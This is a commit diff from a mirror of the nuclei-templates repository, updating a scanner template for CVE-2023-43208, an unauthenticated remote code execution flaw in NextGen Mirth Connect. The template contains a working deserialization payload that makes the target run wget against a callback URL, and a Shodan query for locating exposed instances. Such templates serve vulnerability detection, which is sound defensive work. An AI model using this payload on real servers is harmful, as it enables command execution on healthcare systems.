daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2023-43208.yaml

patch-1
Ritik Chaddha 2023-10-25 23:43:45 +05:30 committed by GitHub
parent 833c47ce41
commit d8b65a0338
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
http/cves/2023/CVE-2023-43208.yaml
View File

@ -1,12 +1,20 @@
id: CVE-2023-43208 id: CVE-2023-43208
info: info:
name: NextGen Mirth Connect - Remote Code Execution Vulnerability name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch author: iamnoooob,rootxharsh,pdresearch
severity: critical severity: critical
description: | description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference: reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
classification:
cve-id: CVE-2023-43208
metadata:
max-request: 2
verified: true
shodan-query: title:"mirth connect administrator"
tags: cve,cve2023,nextgen,rce
http: http:
- raw: - raw:
@ -28,7 +36,7 @@ http:
<handler class="java.beans.EventHandler"> <handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder"> <target class="java.lang.ProcessBuilder">
<command> <command>
<string>curl</string> <string>wget</string>
<string>http://{{interactsh-url}}/</string> <string>http://{{interactsh-url}}/</string>
</command> </command>
</target> </target>
@ -37,17 +45,19 @@ http:
</dynamic-proxy> </dynamic-proxy>
</sorted-set> </sorted-set>
extractors:
- type: regex
part: body_1
internal: true
name: detected_version
group: 1
regex:
- '(.*)'
matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'compare_versions(detected_version, "<4.4.1") && contains(interactsh_protocol, "dns") && status_code_1 == 200 && status_code_2 == 500' - 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
name: version
group: 1
regex:
- '(.*)'
internal: true